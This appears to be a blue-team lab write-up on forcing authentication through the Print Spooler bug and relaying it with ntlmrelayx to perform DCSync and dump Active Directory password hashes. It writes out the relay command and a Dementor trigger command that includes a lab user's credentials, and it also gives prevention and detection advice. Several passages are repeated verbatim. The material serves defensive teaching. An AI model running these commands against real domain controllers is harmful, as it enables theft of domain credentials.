Print Spooler & NTLM Relaying
- Print Spooler & NTLM Relaying
The command impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support is utilizing the ntlmrelayx tool from the Impacket suite to perform an NTLM relay attack specifically targeting a Domain Controller (DC) to execute a DCSync attack. Here’s a detailed breakdown of each part of the command:- impacket-ntlmrelayx: This is the tool from the Impacket suite that is used to perform NTLM relay attacks. NTLM relay attacks involve relaying NTLM authentication to another service that accepts NTLM authentication.
- -t dcsync://172.16.18.4: This specifies the target of the NTLM relay attack. Here, dcsync is used as a prefix to indicate that the attack should perform a DCSync operation on the specified target, which is a Domain Controller with the IP address 172.16.18.4. A DCSync attack allows an attacker to simulate the behavior of a Domain Controller and request replication of credentials from the Active Directory, effectively dumping password hashes from the DC.
- -smb2support: This flag enables SMBv2 support. Since NTLM relay attacks typically involve relaying NTLM authentication over SMB, enabling support for SMBv2 is necessary if the target system supports or requires SMBv2 for communication.
- impacket-ntlmrelayx: This is the tool from the Impacket suite that is used to perform NTLM relay attacks. NTLM relay attacks involve relaying NTLM authentication to another service that accepts NTLM authentication.
- Next, we need to trigger the PrinterBug using the Kali box with NTLMRelayx listening. To trigger the connection back, we’ll use Dementor (when running from a non-domain joined machine, any authenticated user credentials are required, and in this case, we assumed that we had previously compromised Bob):
- python3 ./dementor.py 172.16.18.20 172.16.18.3 -u bob -d eagle.local -p Slavi123
- Now, switching back to the terminal session with NTLMRelayx, we will see that DCSync was successful:
- python3 ./dementor.py 172.16.18.20 172.16.18.3 -u bob -d eagle.local -p Slavi123
- Preventing the abuse of Print Spooler
- Print Spooler should be disabled on all servers that are not printing servers. Domain Controllers and other core servers should never have additional roles/functionalities that open and widen the attack surface toward the core AD infrastructure.
- Print Spooler should be disabled on all servers that are not printing servers. Domain Controllers and other core servers should never have additional roles/functionalities that open and widen the attack surface toward the core AD infrastructure.
- Detecting the abuse of Print Spooler
- In the case of using NTLMRelayx to perform DCSync, no event ID 4662 is generated (as mentioned in the DCSync section); however, to obtain the hashes as DC1 from DC2, there will be a successful logon event for DC1. This event originates from the IP address of the Kali machine, not the Domain Controller, as we can see below:
- In the case of using NTLMRelayx to perform DCSync, no event ID 4662 is generated (as mentioned in the DCSync section); however, to obtain the hashes as DC1 from DC2, there will be a successful logon event for DC1. This event originates from the IP address of the Kali machine, not the Domain Controller, as we can see below:
Blue Team Odyssey 
Leave a comment